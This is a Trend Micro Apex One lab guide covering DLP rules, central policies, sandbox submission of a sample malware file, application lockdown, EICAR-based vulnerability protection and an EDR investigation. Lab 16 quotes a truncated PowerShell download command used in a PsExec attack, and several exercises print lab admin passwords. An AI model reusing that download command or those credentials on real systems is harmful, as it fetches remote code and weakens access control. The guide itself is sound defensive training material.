In this exercise, a Data Leak Prevention Template will be configured.
1 Click Agents > Data Loss Prevention > DLP Templates.

94 © 2019 Trend Micro Inc. Education


Lab 11: Preventing Data Loss

2 In the Data Loss Prevention Templates window, click Add.

3 Complete the Properties section in the Data Loss Prevention Templates windows as follows:
• Name: Confidential Contracts
• Available data identifiers: search for Jack Taylor. Click to select it and click >> to add it to
the Selected data identifiers list.
Click Save.

© 2019 Trend Micro Inc. Education 95


Lab 11: Preventing Data Loss

4 A notification is displayed once the settings are successfully changed. Click Close.

5 Verify that the new Confidential Contracts template has been added to the list of available
templates.

Exercise 4: Deploy a New Data Leak Prevention Policy


In this exercise, participants will create and deploy a new Data Leak Prevention Policy.
1 In the Agent Management list, right-click the Classroom domain. Click Settings > DLP Settings.

96 © 2019 Trend Micro Inc. Education


Lab 11: Preventing Data Loss

2 A message is displayed alerting you that the Data Protection module has not been deployed to
the Agents. Click OK to deploy this component to the computers in this group.

3 In the Data Loss Prevention Configurations window, click the policies link.

4 In the Data Loss Prevention Policy Settings window, click Enable Data Loss Prevention. On the
Rules tab, click Add.

5 Verify that Enable this rule is selected. Type a name for the rule, such as Confidential
current contracts.
6 From the Template tab, search for the HIPAA template. Click to select it and click Add > to move it
to the Selected Templates column.

© 2019 Trend Micro Inc. Education 97


Lab 11: Preventing Data Loss

7 Repeat this step for the newly created Confidential Contracts Template.

Click Next.

98 © 2019 Trend Micro Inc. Education


Lab 11: Preventing Data Loss

8 On the Channel tab, click to enable Network Channels which selected all channels in the list. Click
All transmissions under Transmission Scope, and click to enable all System and Application
Channels. Click Next.

9 On the Action tab, set Action to Block. Click to enable the Additional actions of Notify the agent
user and User Justification.

Click Save.

© 2019 Trend Micro Inc. Education 99


Lab 11: Preventing Data Loss

10 In the Data Loss Prevention Policy Settings, make sure the new rule has now been added and is
enabled. Click Save and Apply the Settings to Agents.

11 A confirmation will be displayed to inform that the configuration changes have been applied.
Click Close.

12 Access the VM-CLIENT-02 virtual machine. A pop-up notification is displayed on the client
computer requesting a restart of the machine.
Click Restart.

Note: It may take several minutes for the Data Leak Prevention components to be deployed. You can
accelerate the deployment in the classroom by double-clicking the Security Agent icon in the
system tray and clicking Update Now.

100 © 2019 Trend Micro Inc. Education


Lab 11: Preventing Data Loss

13 Once the computer has restarted, open a connection to a shared folder on the CLIENT-03
computer by clicking Run on the taskbar and typing the following path:
\\192.168.4.6\c$
14 Locate the Data Leak Prevention Test Document.txt file on the desktop of the
CLIENT-02 computer and drag the file over to the opened shared folder windows for CLIENT-03.

Note: Do not try to copy it to an Apex One Server share, as this channel (Agent > Server) is not
monitored.

15 When the User Justification message appears, select Yes and choose a reason. Click OK.

16 A Data Loss Prevent Violation message is displayed. Click Close.

© 2019 Trend Micro Inc. Education 101


Lab 11: Preventing Data Loss

17 Return to the VM-DC2016 image and log into the Apex One Web Management console. Locate
and right-mouse click CLIENT-02. Click Logs > DLP Logs. Accept the default criteria and click
Display Logs.

18 Examine the details related to this violation. It make take a few minutes for the log event to
display.

Click Details on the far right side to obtain additional information. Click Close when done.

Exercise 5: Modify Justification Reasons


In this exercise, the justification reasons presented to the user when the policy is triggered will be
modified.
1 Still on the Apex One Server, locate and open the ofcscan.ini file in the following folder:
...\PCCSRV
2 In the [Global Setting] section, locate the following entries for the options listed for User
Justification.
• DlpUserJustificationItem0=
• DlpUserJustificationItem1=

102 © 2019 Trend Micro Inc. Education


Lab 11: Preventing Data Loss

• DlpUserJustificationItem2=

3 Modify the entries as needed and save the changes. The changes will be applied the next time
the Apex One Server is restarted.

Note: Do not modify DlpUserJustificationItem3= if you would like an option called Other: to
appear in the User Justification list.

© 2019 Trend Micro Inc. Education 103


Lab 11: Preventing Data Loss

104 © 2019 Trend Micro Inc. Education


Lab 12: Managing Policies Through Apex
Central
In this lab, participants will configure and deploy an Apex One policy though Apex Central.

Estimated time to complete this lab: 20 minutes

Exercise 1: Integrate Apex Central and Apex One


Before policies can be deployed through Apex Central, communication between Apex One and Apex
Central must be configured.
1 On the VM-WIN2012 image, locate the digital certificate created during the setup of the Apex
Central Server. The certificate file is called TMCM_CA_Cert.pem and is located in the following
folder:
C:\Program Files (x86)\Trend Micro\Control Manager\Certificate\CA\
Copy this file to Lab Files folder.
2 On the VM-DC2016 image, log into the Apex One Web Management console and click
Administration > Settings > Apex Central.
3 In the Apex Central Settings window, the Connection Status should be displayed as Not
connected.
Complete the details of the Apex Central Server as follows:

© 2019 Trend Micro Inc. Education 105


Lab 12: Managing Policies Through Apex Central

• Entity display name: ApexOne


• Server FQDN or IP address: 192.168.4.3
• Port: Accept the default port of 443
• Apex Central Certificate: Click Browse and locate the TMCM_CA_Cert.pem certificate file in
the Lab Files folder.
4 Click Test connection. A connection was successful message should be displayed. Click OK.

5 Click Register. The connection status is updated.

Exercise 2: Create an Apex Central User Account


In this exercise, an Apex Central administrator account will be created in Apex One.
1 Still in the Apex One Web Management console, click Administration > Account Management >
User Accounts.
2 Click Add to create a new account. Complete the details for the account as follows:

106 © 2019 Trend Micro Inc. Education


Lab 12: Managing Policies Through Apex Central

• Select Role: Select Administrator (Built-in) from the list


• User name: Admin (the name of the Apex Central administrator, created during installation)
• Description: Apex Central Administrator
• Password: Pa$$w0rd (using the zero) (the password of the Apex Central administrator,
assigned during installation)
Click Next.
3 Define the Agent Tree Scope to identify the branches of the Agent Tree this administrator will
have control over. The top branch of Apex One Server is selected by default, click Next.

© 2019 Trend Micro Inc. Education 107


Lab 12: Managing Policies Through Apex Central

4 To enable the Apex One items that the Apex Central account will have permissions to control,
click the Apex One Server at the top of the Agent Tree Scop list and click Finish.

5 The new user account is displayed.

108 © 2019 Trend Micro Inc. Education


Lab 12: Managing Policies Through Apex Central

Exercise 3: Confirm Registration


In this exercise, participants will confirm the integration of Apex One and Apex Central by attempting
single sign-on into Apex One.
1 Log into the Apex Central Web Management console by clicking the bookmark in the Internet
Explorer or Chrome browser. Log in with the following credentials:
• User name: Admin
• Password: Pa$$w0rd (with zero, not the letter O)
2 Click Administration > Managed Servers > Server Registration. In the Server Type list, click All.

3 Apex One should be listed as a Registered Server. Click the link with the URL.
4 You should be redirected to the Apex One Web Management console. Since the account for the
Apex Central administrator was assigned the Administrator (Built-in) role, they will be logged into
Apex One with full access to the Web Management console through single sign-on.

Exercise 4: Add Apex One to the Product Directory


In this exercise, the Apex One Server will be added to the Product Directories list.
1 Still in the Apex Central Web Management console, click Directories > Products and click
Directory Management.

© 2019 Trend Micro Inc. Education 109


Lab 12: Managing Policies Through Apex Central

2 Click Local Folder, and click Add Folder.

3 Type a name for a new folder (or directory), for example, Trend Micro Servers and click
Save.

Click OK to confirm the creation of the new directory.


4 Expand the New Entity folder. Drag the Apex One Server device (listed as ApexOne) from the
New Entity folder to the newly created Trend Micro Servers folder.

When prompted, click OK to acknowledge the move.

110 © 2019 Trend Micro Inc. Education


Lab 12: Managing Policies Through Apex Central

5 The Apex One Server should now be displayed in the Trend Micro Servers folder.

Exercise 5: Configure a Policy Template


In this exercise, a policy template will be configured to identify the target endpoints receiving the policy
details as well as the settings to be deployed to the Security Agents on those endpoints.
1 Still in the Apex Central Web Management console, click Policies > Policy Management. Click
Close to hide the information window that is displayed.

© 2019 Trend Micro Inc. Education 111


Lab 12: Managing Policies Through Apex Central

2 In the Product list, select Apex One Security Agent. To create a policy for this product, click
Create or Create one now.

3 The policy template window is displayed. From this window, administrators will select the target
endpoints and identify the policy settings to be deployed.

4 Type a name for the policy, for example, No Scan.


5 Click to enable Specify Target and click Select.

112 © 2019 Trend Micro Inc. Education


Lab 12: Managing Policies Through Apex Central

6 Click the Browse tab. Expand WIN2012 > Local Folder > Trend Micro Servers > ApexOne. Click the
Trend domain. In the right-hand pane, click to select CLIENT-02.

7 Click Add Selected Target , then OK.


8 Expand Real-time Scan Settings and click to disable Virus/Malware Scan.

© 2019 Trend Micro Inc. Education 113


Lab 12: Managing Policies Through Apex Central

9 Scroll down to the bottom of the list and click Deploy.

10 The Policy will be listed as Pending while it awaits deployment to the target endpoint Security
Agents. It may take some time for the policy to deploy. Click Refresh at the top of the policy list
to recheck the status

11 Once applied to the target endpoints, the policy will display with a status of Deployed.

114 © 2019 Trend Micro Inc. Education


Lab 12: Managing Policies Through Apex Central

Exercise 6: Test the New Policy


In this exercise, the deployment of the policy will be confirmed on the target endpoint.
1 Open the VM-CLIENT-02 virtual machine.
2 Double-click the Security Agent icon in the system tray to display the console.
3 Since Real-time Scan was disabled in the policy, the Security Agent displays this status.

4 Click the Connection icon in the console. Note that Real-time Scan is disabled.

5 Close the Security Agent Console.

© 2019 Trend Micro Inc. Education 115


Lab 12: Managing Policies Through Apex Central

116 © 2019 Trend Micro Inc. Education


Lab 13: Submitting Suspicious Files for
Analysis
In this lab, Connected Threat Defense will be enabled in Apex One. A sample malware variant will be
accessed and will be added to the Suspicious Objects list for blocking by Security Agents. Deep Discover
Analyzer and Apex Central are already installed in the classroom environment for the following
exercises.

Estimate time to complete this lab: 40 minutes

Exercise 1: Register Deep Discovery Analyzer With


Apex Central
In this first exercise, the Deep Discovery Analyzer device will be added to Apex central as a Managed
Server.
1 In the VM-DC2016 virtual machine, open the Apex Central Web Management console and click
Administration > Managed Servers > Server Registration.
2 Add Deep Discovery Analyzer with the following server details:

• Server: https://192.168.4.5
• Display Name: Analyzer
• Product: Deep Discovery Analyzer
• User name: admin
• Password: Admin1234!
Click Save.

© 2019 Trend Micro Inc. Education 117


Lab 13: Submitting Suspicious Files for Analysis

3 Deep Discovery Analyzer is now listed as a Managed Server.

Exercise 2: Add Deep Discovery Analyzer to the


Product Directory
In this exercise, Deep Discovery Analyzer will be added to the Product Directory in Apex Central.
1 Still in Apex Central Web Management console, click Directories > Products.
2 Click Directory Management.

3 Expand the New Entity folder. Drag the Analyzer device to the Trend Micro Servers folder.

4 When prompted, click OK to acknowledge the move.

118 © 2019 Trend Micro Inc. Education


Lab 13: Submitting Suspicious Files for Analysis

5 Deep Discover Analyzer should be displayed in the Trend Micro Servers folder.

Exercise 3: Subscribe Apex One to the Suspicious


Objet List
1 Return to the Apex One Web Management console and click Administration > Settings >
Suspicious Object List.

2 In the Agent Settings section, verify that the following lists are enabled (URL, IP and File and
Domain).
3 Click Test Connection. A success message should be displayed in the console window.

4 Click Save.

© 2019 Trend Micro Inc. Education 119


Lab 13: Submitting Suspicious Files for Analysis

Exercise 4: Submit Suspicious Files


In this exercise, a suspicious file will be submitted to Deep Discover Analyzer for sandbox analysis.
Predictive Machine Learning will be disabled beforehand, to ensure that the file is passed to Deep
Discovery Analyzer.
1 Return to the Agent Management list. Right-mouse click the CLIENT-03 computer. Click Settings >
Predictive Machine Learning Settings.
2 Click to disable Predictive Machine Learning. (This will prevent it from interfering with this lab
exercise) and click Save.

3 A message is displayed confirming the configuration settings have been applied. Click Close.

4 Right-mouse click CLIENT-03 again and click Settings > Sample Submission.
5 Click to Enable suspicious file submission to Virtual Analyzer and click Save.

120 © 2019 Trend Micro Inc. Education


Lab 13: Submitting Suspicious Files for Analysis

6 A message is displayed confirming the configuration settings have been applied. Click Close.

7 Open the VM-CLIENT-03 virtual machine and in a Web browser click the Detections bookmark or
type the following URL to access the sample malware site:
http://detection.trend.local
8 In the Connected Threat Defense section, click l1-1.doc and save it to the Windows 10 desktop.

Exercise 5: Track the Submission


1 Return to the DC2016 computer. In Windows Explorer, browse to the following folder and note
that a file passed from the Security Agent is waiting for submission to Deep Discovery Analyzer:
...PCCSVR\TEMP\Sample Submission
2 Log into the Deep Discovery Analyzer Web Management console by entering the following URL
in a web browser, or by clicking the bookmark in the browser:
https://192.168.4.5
3 Log in with the following Deep Discovery Analyzer credentials when prompted:
• User name: admin
• Password: Admin1234!

© 2019 Trend Micro Inc. Education 121


Lab 13: Submitting Suspicious Files for Analysis

4 Verify that the file has been submitted by the Apex One Server by clicking Virtual Analyzer >
Submitters. Apex One should be displayed (as OfficeScan) as the submitter of the object.

5 Click Virtual Analyzer > Submissions. On the Processing tab, verify that the l1-1 [1].doc file is being
processed by the Analyzer under today's date. There will be some delay before the file is
forwarded from the Apex One Server and processing of the file by Deep Discovery Analyzer
begins.

6 Once the submission is processed, the entry will be displayed on the Completed tab. There will be
some delay while the file is processed.

122 © 2019 Trend Micro Inc. Education


Lab 13: Submitting Suspicious Files for Analysis

7 Click Virtual Analyzer > Suspicious Objects and verify the object it is now visible in the list.

8 Return to the Apex Central Web Management console and click Threat Intel > Virtual Analyzer
Suspicious Objects and verify the object it is now visible in the list. You may need to wait several
minutes for the results of the analysis to be passed to Apex Central.

© 2019 Trend Micro Inc. Education 123


Lab 13: Submitting Suspicious Files for Analysis

9 Click to select the object in the list and click Configure Scan Action.

10 In the Scan Action window, select Block in the For selected files section and click Apply.

11 When prompted, confirm the application of the scan action. Click Apply Scan Action.

124 © 2019 Trend Micro Inc. Education


Lab 13: Submitting Suspicious Files for Analysis

The Scan Action is changed to Block.

12 Back in the Apex One Web Management console, go to Administration > Settings > Suspicious
Object List.
13 Under Suspicious Object List Subscription section, click Syn Now.

© 2019 Trend Micro Inc. Education 125


Lab 13: Submitting Suspicious Files for Analysis

14 Return to the VM-CLIENT-03 virtual machine. In the System Tray in the lower right-hand corner
of the screen, right click the Apex One icon and click Update.

15 On the VM-CLIENT-03 desktop, double-click the L1-1.doc malware sample that was saved in an
earlier step and click Run. This time, a suspicious file violation should be displayed.

126 © 2019 Trend Micro Inc. Education


Lab 13: Submitting Suspicious Files for Analysis

16 Click the number link next to Suspicious Files in the Alert to view the log entry for the detection.
Click Close when done.

17 Return to the Apex One Web Management console and in the Agent Management list, right-
mouse click the VM-CLIENT-03 computer and click Logs > Suspicious Files Logs.
18 Accept the default log retrieval criteria and click Display Logs.

19 An entry should be displayed for the object with an Access Denied action .

20 Return to the Apex Central Web Management console and click Threat Intel > Virtual Analyzer
Suspicious Objects.

© 2019 Trend Micro Inc. Education 127


Lab 13: Submitting Suspicious Files for Analysis

21 Select the object in the list, and click View.

22 Examine all the information provided for the different threat stages:
Sample Submission

128 © 2019 Trend Micro Inc. Education


Lab 13: Submitting Suspicious Files for Analysis

Analysis

Distribution

Impact Analysis and Mitigation

23 Close the Apex Central and Deep Discovery Analyzer Web Management consoles.

© 2019 Trend Micro Inc. Education 129


Lab 13: Submitting Suspicious Files for Analysis

130 © 2019 Trend Micro Inc. Education


Lab 14: Blocking Unauthorized
Applications
In this lab, participants will enable Apex One Application Control to lockdown the inventory of
applications on an endpoint computer and block any unauthorized applications from running. The
Application Control policy to do this will be configured and deployed through Apex Central.

Estimated time to complete this lab: 20 minutes

Exercise 1: Create a Policy


In this exercise, a new policy will be created to lockdown the application inventory on filtered endpoint
computers.
1 In the VM-DC2016 image, log into the Apex Central Web Management console and click Policies >
Policy Management.
2 In the Product list, select Apex One Security Agent and click Create to define the new policy.

3 Configure the policy with the following details:


• Name: Lockdown
• Target: Click Specify Target(s) and click Select
- Click Browse and locate the DC2016 computer. Click to select and click Add Selected
Target.

© 2019 Trend Micro Inc. Education 131


Lab 14: Blocking Unauthorized Applications

Click OK.
4 Expand Application Control Settings and click to enable Application Control. Click to enable
Lockdown and disable Assessment mode

5 Scroll to the bottom of the policy list and click Deploy.

132 © 2019 Trend Micro Inc. Education


Lab 14: Blocking Unauthorized Applications

6 The policy will display as Pending as it is deployed to the Security Agent on the DC2016
computer.

7 Once the policy is applied to the endpoint, the policy status will change to Deployed. It may take
some time for the policy to deploy as it generates the inventory. Click Refresh at the top of the
policy list to recheck the status.

8 Click the number 1 in the Deployed column to perform a log query to identify the endpoint
computers on which the policy was deployed.

© 2019 Trend Micro Inc. Education 133


Lab 14: Blocking Unauthorized Applications

Exercise 2: Test the Policy


In this exercise, a new application will be added to the endpoint to test the block. Since this application is
not part of the inventory when lockdown was enabled, the application should be prevented from running.
1 On the VM-DC2016 virtual machine, open the Security Agent console to view the protection
status of this endpoint. Note that Application Control is enabled on this computer. A padlock
symbol may be displayed after a while to indicate that the endpoint is in Lockdown mode.

Note: If Application Control does not display as enabled (with the green icon), click Update in the
Security Agent console to force a refresh. The inventory process will take a few minutes to
complete on the endpoint computer, do not proceed to the next step until Application Control
shows as enabled.

2 Open the Lab Files folder on the desktop. Copy the WinMD5.exe file from this folder to the
C:\Temp folder on the DC-2016 computer.
3 Once the file has been copied, double-click to execute the file.
4 A block message is displayed.

134 © 2019 Trend Micro Inc. Education


Lab 14: Blocking Unauthorized Applications

5 A policy violation message is displayed.

Exercise 3: Define Application Control Criteria


In this exercise, the blocked application will be allowed by adding a new Allow criteria.
1 Return to the Apex Central Web Management console.
2 Ensure that the latest Certified Safe Software Software Pattern list is download. Click
Administration > Updates > Manual Update and at the bottom of the list click Download Now.

Note: It will take a few minutes to download and refresh the list of components.

3 Once complete, expand Application Control and the up-to-date Certified Safe Software Software
Pattern should be displayed.

© 2019 Trend Micro Inc. Education 135


Lab 14: Blocking Unauthorized Applications

4 Click Policies > Policy Resources > Application Control Criteria. A single default criteria is
displayed. The Assess Gray Software List Applications criteria will be displayed once the
Certified Safe Software List Pattern has been downloaded.

5 Click Add Criteria and select Allow.

6 Create an Allow criteria with the following details:

• Name: Allow WinMD5


• Trust Permission: Application cannot execute external processes
• Match method: File Paths
- Specific path
- String
- C:\temp\winmd5.exe
Click Save.

136 © 2019 Trend Micro Inc. Education


Lab 14: Blocking Unauthorized Applications

7 The new Criteria is listed.

8 Return to Policies > Policy Management. Click the Lockdown policy and expand Application
Control Settings.
9 In the User-Defined Rules section, click the All user accounts rule. The policy criteria are
displayed in the Available criteria column.

10 Click each criteria one at a time to move them into the Selected criteria column and click OK.

© 2019 Trend Micro Inc. Education 137


Lab 14: Blocking Unauthorized Applications

11 Scroll down and click Deploy. Wait until the new policy is deployed before proceeding to the next
exercise.

Exercise 4: Test the Allow Rule


In this exercise, the previously blocked application will be launched once again to test the Allow criteria.
1 In Windows Explorer, navigate to the C:\temp folder and double-click WinMD5.exe.
2 The application should run.

Exercise 5: View the Application Control Log Entry


In this exercise, the log entry related to the Application Control incident will be reviewed.
1 Return to the Apex Central Web Management console and click Detections > Logs > Log Query.
2 Select Application Control violations and click OK.

3 Leave the other items at their default and click Search.

138 © 2019 Trend Micro Inc. Education


Lab 14: Blocking Unauthorized Applications

4 The log entry related to the Application Control violation on the DC2016 computer is displayed. It
may take some time for the log entry to display.

5 Close the VM-DC2016 virtual machine.

© 2019 Trend Micro Inc. Education 139


Lab 14: Blocking Unauthorized Applications

140 © 2019 Trend Micro Inc. Education


Lab 15: Protecting Endpoint Computers
from Vulnerabilities
In this lab, participants will enable Apex One Vulnerability Protection to protect an endpoint computer
from operating system exploits.

Estimated time to complete this lab: 20 minutes

Exercise 1: Enable Vulnerability Protection


In this exercise, vulnerability protection will be enabled for a single computer.
1 Open the VM-DC2016 virtual machine and log into Apex Central Web Management console.
2 Click Administration > Updates > Manual Update. Expand Intrusion Prevention and note that the
Vulnerability Protection Pattern has been downloaded. This pattern is updated regularly and
contains the rules to protect the endpoint from vulnerabilities.

© 2019 Trend Micro Inc. Education 141


Lab 15: Protecting Endpoint Computers from Vulnerabilities

3 Click Policies > Policy Resources > Intrusion Prevention Rules. The IPS rules currently downloaded
are displayed.

4 Click Policies > Policy Management and delete the policy called No Scan.
5 Still under Policies > Policy Management, create a new policy for the Security Agent with the
following details:
• Name: Protect Client-02
• Filter: Specify Target and click Select
- Click Browse and expand the tree to display the endpoint computers. Select CLIENT-02
and click Add Selected Targets. Click OK.

142 © 2019 Trend Micro Inc. Education


Lab 15: Protecting Endpoint Computers from Vulnerabilities

6 Expand Vulnerability Protection Settings and insure that Enable Vulnerability Protection is
selected. Click to enable Security Priority mode.

7 In the Search field, type eicar. The Restrict Download of EICAR Test File Over HTTP is
displayed. Note that this rule is enabled automatically in Security Priority mode. This rule will
allow you to test that the Vulnerability Rules are being enforced on the endpoint computer.

8 Scroll to the bottom of the list and click Deploy. The rules are then deployed to the Security
Agent on the CLIENT-02 computer. Wait until the policy is deployed before continuing.

Exercise 2: Test Vulnerability Protection


In this exercise, the EICAR sample file will be downloaded to trigger the Vulnerability Protection rule.

© 2019 Trend Micro Inc. Education 143


Lab 15: Protecting Endpoint Computers from Vulnerabilities

1 Open the VM-CLIENT-02 image and confirm that Vulnerability Protection has been deployed.

2 In a Web browser on the CLIENT-02 computer, type the following URL to download the EICAR test
file:
http://2016.eicar.org/85-0-Download.html
3 Click the eicar.com file to download.

4 The connection to the Web page should be reset and a browser error displayed.

144 © 2019 Trend Micro Inc. Education


Lab 15: Protecting Endpoint Computers from Vulnerabilities

Exercise 3: View the Vulnerability Protection Log


Entry
In this exercise, the log entry related to the Vulnerability Protection incident will be reviewed
1 Return to the Apex Central Web Management console.
2 Click Detections > Logs > Log Query. In the Log Query window, set the query to Intrusion
Prevention and leave the remaning options at their default and click Search.

© 2019 Trend Micro Inc. Education 145


Lab 15: Protecting Endpoint Computers from Vulnerabilities

146 © 2019 Trend Micro Inc. Education


Lab 16: Endpoint Detection and
Response
In this lab, participants will deploy a policy using Endpoint Sensor within the classroom lab environment.
Participants will then run a preliminary investigation using Endpoint Detection and Response in a trial
environment to track the steps in an attack.

Estimated time to complete this lab: 20 minutes

Exercise 1: Deploy the Endpoint Sensor License


Endpoint Sensor, used in conjunction with Endpoint Detection and Response, is licensed separately from
Apex One and requires a unique activation code. In this exercise, the activation code for Endpoint Sensor
will be deployed in the lab environment.
1 Open the VM-DC2016 virtual machine and log into Apex Central Web Management console. Click
Administration > License Management > Managed Products. A single license should be displayed.
Click Add and Deploy.

2 You will be prompted to enter the new activation code.

Open the Product Cloud activation code.txt file in the Lab Files folder and copy and
paste the Endpoint Sensor activation code into the Web form and click Next.

© 2019 Trend Micro Inc. Education 147


Lab 16: Endpoint Detection and Response

3 In the Select Product for Activation Code frame, expand the tree and click ApexOne. Click
Deploy.

4 A message is displayed in Apex Central indicating that it may take some time to deploy the
activation code.

5 When the Activated Products column displays one product for the new license, click the number
1 in the column.

148 © 2019 Trend Micro Inc. Education


Lab 16: Endpoint Detection and Response

6 In the Managed Service column, note that Apex One: Endpoint Sensor is listed.

Exercise 2: Deploy a Policy using Endpoint Sensor


In this exercise, a new policy will be created to deploy Endpoint Sensor on the endpoints in the lab
environment.
1 Still in the Apex Central Web Management console and click Policies > Policy Management.
2 Delete the Protect Client-02 policy in the list for theApex One Security Agent.
3 Click Create to define a new policy.
4 The policy template window is displayed. Type a name for the policy, for example, Endpoint
Sensor.
5 Click Specify Target(s) and click Select.
6 Click Browse and expand the tree to display the endpoint. Select CLIENT-02 and CLIENT-03 and
click Add Selected Targets, then OK.

7 Expand Endpoint Sensor Settings and configure the policy settings as follows:
• Enable Endpoint Sensor: selected
• Enable Event recording: selected
• Send a subset of log data to perform preliminary investigation: selected
• Upload frequency: Every 15 minutes

© 2019 Trend Micro Inc. Education 149


Lab 16: Endpoint Detection and Response

• Enable Attack Discovery to detect known attack indicators on endpoints: selected.

8 Scroll down to the bottom of the list and click Deploy.

9 The Policy will be listed as Pending while it awaits deployment to the target endpoint Security
Agents. Once applied to the target endpoints, the policy will display with a status of Deployed.

150 © 2019 Trend Micro Inc. Education


Lab 16: Endpoint Detection and Response

Exercise 3: Verify the New Policy


In this exercise, the deployment of the policy will be verified on the target endpoint.
1 Open the VM-CLIENT-02 virtual machine.
2 Double-click the Security Agent icon in the system tray to display the console.

3 Click the Connection icon in the console and confirm that Endpoint Sensor is enabled.
4 Close the Security Agent Console.

Exercise 4: Investigate a Security Incident


The Endpoint Sensor has been deployed into the classroom environment, however, it will take some time
to accumulate data on activities on the endpoint computers to perform an investigation. An environment
has been pre-configured with attack data to allow participants to test an Endpoint Detection and
Response scenario.

Note: During the trial, you may be prompted to extend the trial period. If this occurs, click the Back
button in the browser to clear this message.

1 Still on the VM-DC2016 virtual machine, open Google Chrome and click the Trial Cloud bookmark
in the browser. Alternately, type the following URL in Chrome:
https://trial.productcloud.trendmicro.com/auth/apex?socialRef=a3b8feb4
Click Start my trial.
2 A floating pane with instruction on using the trial is displayed. Click ¬ to advance through the
instructions, or click Skip.
3 A list of sample scenarios is presented in the sidebar on the right-hand side of the window. Click
scenario 2-Endpoint Detection and Response.
4 Instructions for the scenario are listed in the sidebar or follow these written instructions.
5 Make sure you are on the Apex Central VM. Double click the Control Manager shortcut on the
desktop to login to the Apex Central Web Management console. When prompted, enter the
credentials as follows:
• Username: root
• Password: Tr3ndM1cr0!
Click Log on

© 2019 Trend Micro Inc. Education 151


Lab 16: Endpoint Detection and Response

6 Click Response > Preliminary Investigation. Under Custom criteria, click +Add criteria and select
User account. Type the user account name of johndoe and click Assess button.

7 The assessment returns one affected machine called WIN7CLIENT. Click the checkbox to select
WIN7CLIENT and click Generate Root Cause Analysis.

8 Provide the necessary details for the analysis report as follows:


• Name: Classroom Report
• Period: All
Click Generate to launch the Root Cause Analysis task.

152 © 2019 Trend Micro Inc. Education


Lab 16: Endpoint Detection and Response

9 For your convenience, a Root Cause Analysis for this scenario has already been run and it is
displayed in the list as Erroneous User. We will use this to proceed with the investigation. Click
the completed task called Erroneous User to view the Root Cause Analysis result page.

From here, you can view information like Target Endpoint, First Observed Object, Matched
Objects, Noteworthy Objects, and the Attack Chain view.

Note the First Observed Object is an application called PSEXESVC.exe, meaning the attack
originated from a remote PC.

© 2019 Trend Micro Inc. Education 153


Lab 16: Endpoint Detection and Response

10 From the attack chain view, click the cmd.exe object to view information about the object
including:
• User: WIN7CLIENT\JohnDoe
• Command line: “cmd” /c powershell -c “&{(New-Object Net.WebClient).Downloadfile...
From the command line, we can deduce that the attack was run from a remote PC with the
PSEXEC tool using an erroneous user account JohnDoe.
Close the tab with the Erroneous User report.
11 Click Response > Preliminary Investigations and run a new Custom criteria investigation with the
following details, and click Assess.
• Criteria: Command line
• Criteria details: johndoe
The assessment result now returns two affected machines (WIN10CLIENT and WIN7CLIENT).

12 From the assessment results, click the icon in the Details column for WIN10CLIENT to open the
Match Details window.

Click the number in the CLI/Registry Occurrences column to view all command line details ran
from WIN10CLIENT.

154 © 2019 Trend Micro Inc. Education


Lab 16: Endpoint Detection and Response

From here, we can see more command lines executed from the WIN10CLIENT.

Based on these findings, we can interpret that the WIN10CLIENT was actually the compromised
machine and WIN7CLIENT was the affected machine.

Exercise 5: Responding to the Incident


In this exercise, we will perform an Incident Response to immediately mitigate the damage on
compromised and affected endpoints .
1 Still in the Apex Central Web Management console, click Response > Preliminary Investigations
and click the Root Cause Analysis Results tab.
2 Click the completed task called Erroneous User to view the Root Cause Analysis result page.
3 Under the Target Endpoint column, click Isolate Endpoint. This will stop all network connections
on the endpoint and it will only be able to communicate with the server while performing
investigations.

© 2019 Trend Micro Inc. Education 155


Lab 16: Endpoint Detection and Response

4 The Apex One agent will pop-up an alert stating that the endpoint will be isolated. Click Isolate
Endpoint.

5 In the Noteworthy Objects column, hover over the number to display all objects that were
marked as Suspicious or Malicious. Legend information for each object is available by hovering
to the legend icon (i) on the lower left side of the Analysis Chains page.
• Black: Normal Object
• Gray: Unrated Object
• Orange: Suspicious Object
• Red: Malicious Object

156 © 2019 Trend Micro Inc. Education


Lab 16: Endpoint Detection and Response

6 In the Analysis Chain view, you should see one (1) suspicious object (SensorTest.exe). Click it
to view the Incident Response options.

• Terminate Object: Remotely terminates the process.


• Add to Suspicious Objects List: Adds the item to User-defined Suspicious Objects to prevent
file access and execution.
• Add to Preliminary Investigation List: Start a new preliminary investigation with a criteria
File name = Suspicious.exe
Close the tab with the Erroneous User report.

Exercise 6: Restore Endpoint Connectivity


In this exercise, the isolated endpoint will be reconnected back to the network.
1 Still in the Apex Central Web Management console, click Directories > Users/Endpoints.

2 Expand Endpoints and double-click All on the left-hand pane pane bar and click to select the
WIN7CLIENT endpoint.

© 2019 Trend Micro Inc. Education 157


Lab 16: Endpoint Detection and Response

3 Click Task > Restore.

158 © 2019 Trend Micro Inc. Education

You might also like